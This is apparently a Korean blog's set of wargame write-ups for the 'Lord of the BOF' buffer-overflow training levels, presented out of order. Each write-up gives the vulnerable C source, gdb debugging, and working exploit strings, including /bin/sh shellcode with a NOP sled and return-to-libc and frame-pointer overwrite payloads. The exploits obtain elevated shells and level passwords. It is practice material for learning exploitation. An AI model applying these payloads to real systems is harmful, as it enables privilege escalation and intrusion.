[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf3\xfb\xff\xbf","\xdf\x84\x04\x08"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵욀?
bash$ Xq
sh: Xq: command not found
bash$ exit
exit
Segmentation fault
[assassin@localhost assassin]$ cd tmp
[assassin@localhost tmp]$ gdb -q ./zombie_assassin ./core
Core was generated by ` aaaaaaaabbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵욀?'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x62626262 in ?? ()
(gdb) x/100x 0xbffffbf3
0xbffffbf3: 0x61616161 0x61616161 0x62626262 0x400fbff9
0xbffffc03: 0x62626262 0x62626262 0x62626262 0x62626262
0xbffffc13: 0x62626262 0x62626262 0xbffffbf3 0x080484df
0xbffffc23: 0x44575000 0x6f682f3d 0x612f656d 0x73617373
0xbffffc33: 0x2f6e6973 0x00706d74 0x4f4d4552 0x4f484554
0xbffffc43: 0x313d5453 0x312e3239 0x322e3836 0x312e3233
0xbffffc53: 0x534f4800 0x4d414e54 0x6f6c3d45 0x686c6163
0xbffffc63: 0x2e74736f 0x61636f6c 0x6d6f646c 0x006e6961
0xbffffc73: 0x5353454c 0x4e45504f 0x752f7c3d 0x622f7273
0xbffffc83: 0x6c2f6e69 0x70737365 0x2e657069 0x25206873
0xbffffc93: 0x53550073 0x613d5245 0x73617373 0x006e6973
0xbffffca3: 0x435f534c 0x524f4c4f 0x6f6e3d53 0x3a30303d
0xbffffcb3: 0x303d6966 0x69643a30 0x3b31303d 0x6c3a3433
0xbffffcc3: 0x31303d6e 0x3a36333b 0x343d6970 0x33333b30
0xbffffcd3: 0x3d6f733a 0x333b3130 0x64623a35 0x3b30343d
0xbffffce3: 0x303b3333 0x64633a31 0x3b30343d 0x303b3333
0xbffffcf3: 0x726f3a31 0x3b31303d 0x333b3530 0x31343b37
0xbffffd03: 0x3d696d3a 0x303b3130 0x37333b35 0x3a31343b
0xbffffd13: 0x303d7865 0x32333b31 0x632e2a3a 0x303d646d
0xbffffd23: 0x32333b31 0x652e2a3a 0x303d6578 0x32333b31
0xbffffd33: 0x632e2a3a 0x303d6d6f 0x32333b31 0x622e2a3a
0xbffffd43: 0x303d6d74 0x32333b31 0x622e2a3a 0x303d7461
0xbffffd53: 0x32333b31 0x732e2a3a 0x31303d68 0x3a32333b
0xbffffd63: 0x73632e2a 0x31303d68 0x3a32333b 0x61742e2a
0xbffffd73: 0x31303d72 0x3a31333b 0x67742e2a 0x31303d7a
(gdb) x/x 0xbffffbf3
0xbffffbf3: 0x61616161
(gdb)
0xbffffbf7: 0x61616161
(gdb)
0xbffffbfb: 0x62626262
(gdb)
0xbffffbff: 0x400fbff9
(gdb) x/x 0xbffffbf3+4
0xbffffbf7: 0x61616161
(gdb)
0xbffffbfb: 0x62626262
(gdb)
0xbffffbff: 0x400fbff9
(gdb)
0xbffffc03: 0x62626262
(gdb) q
[assassin@localhost tmp]$ cd ../
[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf3\xfb\xff\xbf","\xdf\x84\x04\x08"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵욀?
bash$ id
uid=515(assassin) gid=515(assassin) euid=516(zombie_assassin) egid=516(zombie_assassin) groups=515(assassin)
bash$ my-pass
euid = 516
no place to hide
bash$
'Wargame > LOB (Redhat9)' 카테고리의 다른 글
| succubus -> nightmare (0) | 2014.02.20 |
|---|---|
| zombie_assassin -> succubus (0) | 2014.02.20 |
| giant -> assassin (0) | 2014.02.20 |
| bugbear -> giant (0) | 2014.02.20 |
| darkknight -> bugbear (0) | 2014.02.20 |
Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.
기억은 않나지만 ret sleding 으로 풀지않았을까... 생각한다.
0x0 in ?? ()
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x34'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x34'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
c…
Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.
Program received signal SIGTRAP, Trace/breakpoint trap.
0x40001990 in _start () at rtld.c:142
142 rtld.c: No such file or directory.
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x36'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x36'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
co…
Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.
Program received signal SIGTRAP, Trace/breakpoint trap.
0x40001990 in _start () at rtld.c:142
142 rtld.c: No such file or directory.
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x34'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x34'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
co…
Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.
Program received signal SIGTRAP, Trace/breakpoint trap.
0x40001990 in _start () at rtld.c:142
142 rtld.c: No such file or directory.
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x60'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x60'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
…
Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x1000 in ?? ()
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x60'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x60'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
…
Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x1000 in ?? ()
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x45'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x45'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
…
Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0xbffffd00 in ?? ()
(gdb) x/100x 0xbffffd00
0xbffffd00: 0x69616d6f 0x4f4c006e 0x4d414e47 0x69673d45
0xbffffd10: 0x00746e61 0x4f4d4552 0x4f484554 0x313d5453
0xbffffd20: 0x312e3239 0x322e3836 0x312e3232 0x49414d00
0xbffffd30: 0x762f3d4c 0x732f7261 0x6c6f6f70 0x69616d2f
0xbffffd40: 0x69672f6c 0x00746e61 0x4d524554 0x6574783d
0xbffffd50: 0x48006d72 0x5454534f 0x3d455059 0x36383369
0xbffffd60: 0x54415000 0x752f3d48 0x6c2f7273 0x6c61636f
0xbffffd70: 0x6e69622f 0x69622f3a 0x752f3a6e 0x622f7273
0xbffffd80: 0x2f3a6e69 0x2f727375 0x52313158 0x69622f36
0xbffffd90: 0x682f3a6e 0x2f656d6f 0x6e616967 0x69622f74
0xbffffda0: 0x4f48006e 0x2f3d454d 0x656d6f68 0x6169672f
0xbffffdb0: 0x4900746e 0x5455504e 0x2f3d4352 0x2f637465
0xbffffdc0: 0x75706e69 0x00637274 0x4c454853 0x622f3d4c
0xbffffdd0: 0x622f6e69 0x00687361 0x52455355 0x6169673d
0xbffffde0: 0x4200746e 0x5f485341 0x3d564e45 0x6d6f682f
0xbffffdf0: 0x69672f65 0x2f746e61 0x7361622e 0x00637268
0xbffffe00: 0x474e414c 0x5f6e653d 0x4f005355 0x50595453
0xbffffe10: 0x694c3d45 0x0078756e 0x564c4853 0x00313d4c
0xbffffe20: 0x435f534c 0x524f4c4f 0x6f6e3d53 0x3a30303d
0xbffffe30: 0x303d6966 0x69643a30 0x3b31303d 0x6c3a3433
0xbffffe40: 0x31303d6e 0x3a36333b 0x343d6970 0x33333b30
0xbffffe50: 0x3d6f733a 0x333b3130 0x64623a35 0x3b30343d
0xbffffe60: 0x303b3333 0x64633a31 0x3b30343d 0x303b3333
0xbffffe70: 0x726f3a31 0x3b31303d 0x333b3530 0x31343b37
0xbffffe80: 0x3d696d3a 0x303b3130 0x37333b35 0x3a31343b
(gdb) x/100x 0xbffffd00-100
0xbffffc9c: 0x8969622f 0xb0c189e3 0x5351520b 0x80cde189
0xbffffcac: 0x53454c00 0x45504f53 0x2f7c3d4e 0x2f727375
0xbffffcbc: 0x2f6e6962 0x7373656c 0x65706970 0x2068732e
0xbffffccc: 0x55007325 0x4e524553 0x3d454d41 0x53494800
0xbffffcdc: 0x5a495354 0x30313d45 0x48003030 0x4e54534f
0xbffffcec: 0x3d454d41 0x61636f6c 0x736f686c 0x6f6c2e74
0xbffffcfc: 0x646c6163 0x69616d6f 0x4f4c006e 0x4d414e47
0xbffffd0c: 0x69673d45 0x00746e61 0x4f4d4552 0x4f484554
0xbffffd1c: 0x313d5453 0x312e3239 0x322e3836 0x312e3232
0xbffffd2c: 0x49414d00 0x762f3d4c 0x732f7261 0x6c6f6f70
0xbffffd3c: 0x69616d2f 0x69672f6c 0x00746e61 0x4d524554
0xbffffd4c: 0x6574783d 0x48006d72 0x5454534f 0x3d455059
0xbffffd5c: 0x36383369 0x54415000 0x752f3d48 0x6c2f7273
0xbffffd6c: 0x6c61636f 0x6e69622f 0x69622f3a 0x752f3a6e
0xbffffd7c: 0x622f7273 0x2f3a6e69 0x2f727375 0x52313158
0xbffffd8c: 0x69622f36 0x682f3a6e 0x2f656d6f 0x6e616967
0xbffffd9c: 0x69622f74 0x4f48006e 0x2f3d454d 0x656d6f68
0xbffffdac: 0x6169672f 0x4900746e 0x5455504e 0x2f3d4352
0xbffffdbc: 0x2f637465 0x75706e69 0x00637274 0x4c454853
0xbffffdcc: 0x622f3d4c 0x622f6e69 0x00687361 0x52455355
0xbffffddc: 0x6169673d 0x4200746e 0x5f485341 0x3d564e45
0xbffffdec: 0x6d6f682f 0x69672f65 0x2f746e61 0x7361622e
0xbffffdfc: 0x00637268 0x474e414c 0x5f6e653d 0x4f005355
0xbffffe0c: 0x50595453 0x694c3d45 0x0078756e 0x564c4853
0xbffffe1c: 0x00313d4c 0x435f534c 0x524f4c4f 0x6f6e3d53
(gdb) x/100x 0xbffffd00-300
0xbffffbd4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbe4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbf4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc04: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc14: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc24: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc34: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc44: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc54: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc64: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc74: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc84: 0x90909090 0x90909090 0x90909090 0xc289c031
0xbffffc94: 0x2f6e6850 0x2f686873 0x8969622f 0xb0c189e3
0xbffffca4: 0x5351520b 0x80cde189 0x53454c00 0x45504f53
0xbffffcb4: 0x2f7c3d4e 0x2f727375 0x2f6e6962 0x7373656c
0xbffffcc4: 0x65706970 0x2068732e 0x55007325 0x4e524553
0xbffffcd4: 0x3d454d41 0x53494800 0x5a495354 0x30313d45
0xbffffce4: 0x48003030 0x4e54534f 0x3d454d41 0x61636f6c
0xbffffcf4: 0x736f686c 0x6f6c2e74 0x646c6163 0x69616d6f
0xbffffd04: 0x4f4c006e 0x4d414e47 0x69673d45 0x00746e61
0xbffffd14: 0x4f4d4552 0x4f484554 0x313d5453 0x312e3239
0xbffffd24: 0x322e3836 0x312e3232 0x49414d00 0x762f3d4c
0xbffffd34: 0x732f7261 0x6c6f6f70 0x69616d2f 0x69672f6c
0xbffffd44: 0x00746e61 0x4d524554 0x6574783d 0x48006d72
0xbffffd54: 0x5454534f 0x3d455059 0x36383369 0x54415000
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x37'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x37'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
c…
Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0xbffffd00 in ?? ()
(gdb) q
The program is running. Exit anyway? (y or n) y
[giant@localhost tmp]$
[giant@localhost tmp]$ r `perl -e 'print "\x1e\x85\x04\x08"x37'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
bash: r: command not found
[giant@localhost tmp]$ bash2
[giant@localhost tmp]$ ./assassin `perl -e 'print "\x1e\x85\x04\x08"x37'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
…
bash$ id
uid=514(giant) gid=514(giant) groups=514(giant)
bash$ q
sh: q: command not found
bash$ exit
exit
[giant@localhost tmp]$ cd ../
[giant@localhost giant]$ ls
assassin assassin.c tmp
[giant@localhost giant]$ finger
Login Name Tty Idle Login Time Office Office Phone
giant pts/0 Jul 30 18:48 (192.168.222.1)
[giant@localhost giant]$ ./assassin `perl -e 'print "\x1e\x85\x04\x08"x37'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
…
bash$ id
uid=514(giant) gid=514(giant) euid=515(assassin) egid=515(assassin) groups=514(giant)
bash$ my-pass
euid = 515
pushing me away
bash$
'Wargame > LOB (Redhat9)' 카테고리의 다른 글
| zombie_assassin -> succubus (0) | 2014.02.20 |
|---|---|
| assassin -> zombie_assassin (0) | 2014.02.20 |
| bugbear -> giant (0) | 2014.02.20 |
| darkknight -> bugbear (0) | 2014.02.20 |
| golem -> darkknight (0) | 2014.02.20 |
문제는 다음과 같다.
[bugbear@localhost tmp]$ cat ../giant.c
/*
The Lord of the BOF : The Fellowship of the BOF
- giant
- RTL2
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
main(int argc, char *argv[])
{
char buffer[40];
FILE *fp;
char *lib_addr, *execve_offset, *execve_addr;
char *ret;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// gain address of execve
fp = popen("/usr/bin/ldd /home/giant/assassin | /bin/grep libc | /bin/aw k '{print $4}'", "r");
fgets(buffer, 255, fp);
sscanf(buffer, "(%x)", &lib_addr);
fclose(fp);
fp = popen("/usr/bin/nm /lib/libc.so.6 | /bin/grep __execve | /bin/awk ' {print $1}'", "r");
fgets(buffer, 255, fp);
sscanf(buffer, "%x", &execve_offset);
fclose(fp);
execve_addr = lib_addr + (int)execve_offset;
// end
memcpy(&ret, &(argv[1][44]), 4);
if(ret != execve_addr)
{
printf("You must use execve!\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
/*
The Lord of the BOF : The Fellowship of the BOF
- giant
- RTL2
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
main(int argc, char *argv[])
{
char buffer[40];
FILE *fp;
char *lib_addr, *execve_offset, *execve_addr;
char *ret;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// gain address of execve
fp = popen("/usr/bin/ldd /home/giant/assassin | /bin/grep libc | /bin/aw k '{print $4}'", "r");
fgets(buffer, 255, fp);
sscanf(buffer, "(%x)", &lib_addr);
fclose(fp);
fp = popen("/usr/bin/nm /lib/libc.so.6 | /bin/grep __execve | /bin/awk ' {print $1}'", "r");
fgets(buffer, 255, fp);
sscanf(buffer, "%x", &execve_offset);
fclose(fp);
execve_addr = lib_addr + (int)execve_offset;
// end
memcpy(&ret, &(argv[1][44]), 4);
if(ret != execve_addr)
{
printf("You must use execve!\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
여기서는 execve함수만을 써야한다.
execve함수로 인자구성을 해주려면
execve("실행시킬문자열",실행시킬문자열의 포인터,NULL)이 필요하다.
즉, execve("/bin/sh",&("/bin/sh"),0) 이런 식이 필요하다.
처음에는 R이랑 R2라는 환경변수에 각각 /bin/sh의 주소값과 엄청난 널값을 넣고 해보려고 했다.
0xbffffdca: "R2="
0xbffffdce: "USER=bugbear"
0xbffffddb: "BASH_ENV=/home/bugbear/.bashrc"
0xbffffdfa: "LANG=en_US"
0xbffffe05: "R=u¿\017@"
0xbffffe0c: "OSTYPE=Linux"
0xbffffe19: "SHLVL=1"
0xbffffdce: "USER=bugbear"
0xbffffddb: "BASH_ENV=/home/bugbear/.bashrc"
0xbffffdfa: "LANG=en_US"
0xbffffe05: "R=u¿\017@"
0xbffffe0c: "OSTYPE=Linux"
0xbffffe19: "SHLVL=1"
그러나 변수가 위치한 주소는 내가 의도했던 주소랑 전혀 달랐다.
거기에다가 알파벳의 가장 마지막인 Z로 해서 널값과 가까이해서 페이로드를 구성해봤지만,
그것은 나의 착각이었다.
그 사이 가운데에 널값이 들어 있을 것이라고 생각을 했었지만, 다른 값이 들어있었다.
0xbffffe12: "Z=u¿\017@"
0xbffffe19: "SHLVL=1"
0xbffffe21: "LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;---Type <return> to continue, or q <return> to quit---
32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01"...
0xbffffee9: ";32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;3"...
0xbfffffb1: "5:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:"
0xbfffffe4: "/home/bugbear/tmp/giant"
0xbffffffc: ""
0xbffffe19: "SHLVL=1"
0xbffffe21: "LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;---Type <return> to continue, or q <return> to quit---
32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01"...
0xbffffee9: ";32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;3"...
0xbfffffb1: "5:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:"
0xbfffffe4: "/home/bugbear/tmp/giant"
0xbffffffc: ""
그래서 이용하기로 생각한것이 argv였다.
argv[0]은 스택의 맨 마지막에도 찌꺼기가 남는다.
0xbfffffe4: "/home/bugbear/tmp/giant" 와 같이 말이다.
일부로 파일명을 "/bin/sh"의 문자열의 주소를 가리키는 주소로 변경한 뒤, 그 주소를 가리키는 포인터로 인자구성을 하면 된다.
그리고 execve로 인자구성을 하려면 바로 뒤에 null문자가 와야한다.
./`perl -e 'print "\xf9\xbf\x0f\x40"'` "`perl -e 'print "\x48\x9d\x0a\x40"x12,"\xe0\x91\x03\x40","\xf9\xbf\x0f\x40","\xf7\xff\xff\xbf","\xfc\xff\xff\xbf"'`"
'Wargame > LOB (Redhat9)' 카테고리의 다른 글
| assassin -> zombie_assassin (0) | 2014.02.20 |
|---|---|
| giant -> assassin (0) | 2014.02.20 |
| darkknight -> bugbear (0) | 2014.02.20 |
| golem -> darkknight (0) | 2014.02.20 |
| skeleton -> golem (0) | 2014.02.20 |
기초적인 RTL문제였다.
난이도로 따지면 이전문제보다 더 쉬운정도 ㅋㅋㅋ
system함수를 사용했다.
문제는 다음과 같다.
[darkknight@localhost darkknight]$ cat bugbear.c
/*
The Lord of the BOF : The Fellowship of the BOF
- bugbear
- RTL1
*/
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
char buffer[40];
int i;
if(argc < 2){
printf("argv error\n");
exit(0);
}
if(argv[1][47] == '\xbf')
{
printf("stack betrayed you!!\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
/*
The Lord of the BOF : The Fellowship of the BOF
- bugbear
- RTL1
*/
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
char buffer[40];
int i;
if(argc < 2){
printf("argv error\n");
exit(0);
}
if(argv[1][47] == '\xbf')
{
printf("stack betrayed you!!\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
/bin/bash문자열을 찾는 소스는 다음과 같다
int main(int argc,char **argv)
{
long shell;
shell = 0x40058ae0; // system함수의 주소를 넣음.
while(memcmp((void *)shell,"/bin/sh",8))shell++;
printf("\"/bin/sh\" is at 0x%x\n",shell);
}
{
long shell;
shell = 0x40058ae0; // system함수의 주소를 넣음.
while(memcmp((void *)shell,"/bin/sh",8))shell++;
printf("\"/bin/sh\" is at 0x%x\n",shell);
}
[darkknight@localhost darkknight]$ ./bugbear `perl -e 'print "\xe0\x8a\x05\x40
"x12,"aaaa","\xf9\xbf\x0f\x40"'`
?@?@?@?@?@?@?@?@?@?@?@?@aaaa廈@
bash$ id
uid=512(darkknight) gid=512(darkknight) euid=513(bugbear) egid=513(bugbear) grou
ps=512(darkknight)
bash$ my-pass
euid = 513
new divide
"x12,"aaaa","\xf9\xbf\x0f\x40"'`
?@?@?@?@?@?@?@?@?@?@?@?@aaaa廈@
bash$ id
uid=512(darkknight) gid=512(darkknight) euid=513(bugbear) egid=513(bugbear) grou
ps=512(darkknight)
bash$ my-pass
euid = 513
new divide
OS가 Redhat 6.2라서 system함수 안에 getuid()함수가 없으므로 사용할 수 있었다.
'Wargame > LOB (Redhat9)' 카테고리의 다른 글
| giant -> assassin (0) | 2014.02.20 |
|---|---|
| bugbear -> giant (0) | 2014.02.20 |
| golem -> darkknight (0) | 2014.02.20 |
| skeleton -> golem (0) | 2014.02.20 |
| vampire -> skeleton (0) | 2014.02.20 |
일단 소스를 보면,
[golem@localhost golem]$ cat darkknight.c
/*
The Lord of the BOF : The Fellowship of the BOF
- darkknight
- FPO
*/
#include <stdio.h>
#include <stdlib.h>
void problem_child(char *src)
{
char buffer[40];
strncpy(buffer, src, 41);
printf("%s\n", buffer);
}
main(int argc, char *argv[])
{
if(argc<2){
printf("argv error\n");
exit(0);
}
problem_child(argv[1]);
}
/*
The Lord of the BOF : The Fellowship of the BOF
- darkknight
- FPO
*/
#include <stdio.h>
#include <stdlib.h>
void problem_child(char *src)
{
char buffer[40];
strncpy(buffer, src, 41);
printf("%s\n", buffer);
}
main(int argc, char *argv[])
{
if(argc<2){
printf("argv error\n");
exit(0);
}
problem_child(argv[1]);
}
힌트로 위에 FPO가 나와있는데 "stack Frame Pointer Operation"의 약자인 것 같다. (SFPO가 아니네요 ㅋㅋ)
0x8048440 <problem_child>: push %ebp
0x8048441 <problem_child+1>: mov %esp,%ebp
0x8048441 <problem_child+1>: mov %esp,%ebp
이 부분은 함수 프롤로그 부분인데
예전 함수의 ebp를 백업하는 부분이다.
지금은 main함수 안에서 problem_child라는 함수 안으로 들어와 있는데, 함수가 종료할 때, 이전 함수의 Base Pointer를 찾아가기 위해서이다.
조작된 sfp를 갖고 나와서
leave ret이 진행 되므로
mov %ebp,%esp
pop %ebp
를 수행한다.
즉 ebp를 esp가 가리키는 곳에 넣는다. 그리고 그 ebp를 pop하면서 esp+4가 된다.
따라서 sfp가 가리키는곳의 +4가 main함수의 return address인 것이다.
problem_child함수의 ebp(main함수 관점에서 sfp)+4는 main함수의 return address이다.
따라서 여기서는 strncpy함수로 인해서 sfp의 단 1바이트만을 조작할 수 있다.
(gdb) disas problem_child
Dump of assembler code for function problem_child:
0x8048440 <problem_child>: push %ebp
0x8048441 <problem_child+1>: mov %esp,%ebp
0x8048443 <problem_child+3>: sub $0x28,%esp
0x8048446 <problem_child+6>: push $0x29
0x8048448 <problem_child+8>: mov 0x8(%ebp),%eax
0x804844b <problem_child+11>: push %eax
0x804844c <problem_child+12>: lea 0xffffffd8(%ebp),%eax
0x804844f <problem_child+15>: push %eax
0x8048450 <problem_child+16>: call 0x8048374 <strncpy>
0x8048455 <problem_child+21>: add $0xc,%esp
0x8048458 <problem_child+24>: lea 0xffffffd8(%ebp),%eax
0x804845b <problem_child+27>: push %eax
0x804845c <problem_child+28>: push $0x8048500
0x8048461 <problem_child+33>: call 0x8048354 <printf>
0x8048466 <problem_child+38>: add $0x8,%esp
0x8048469 <problem_child+41>: leave
0x804846a <problem_child+42>: ret
0x804846b <problem_child+43>: nop
End of assembler dump.
(gdb) Quit
(gdb) b *problem_child+38
Breakpoint 2 at 0x8048466
(gdb) r `perl -e 'print "A"x40'`
Starting program: /home/golem/tmp/darkknight `perl -e 'print "A"x40'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Breakpoint 2, 0x8048466 in problem_child ()
(gdb) x/100x $ebp
0xbffff9ac: 0xbffff900 0x0804849e 0xbffffb2f 0xbffff9d8
0xbffff9bc: 0x400309cb 0x00000002 0xbffffa04 0xbffffa10
0xbffff9cc: 0x40013868 0x00000002 0x08048390 0x00000000
0xbffff9dc: 0x080483b1 0x0804846c 0x00000002 0xbffffa04
0xbffff9ec: 0x080482e4 0x080484dc 0x4000ae60 0xbffff9fc
0xbffff9fc: 0x40013e90 0x00000002 0xbffffb14 0xbffffb2f
0xbffffa0c: 0x00000000 0xbffffb58 0xbffffb7a 0xbffffb84
0xbffffa1c: 0xbffffb92 0xbffffbb1 0xbffffbbf 0xbffffbd8
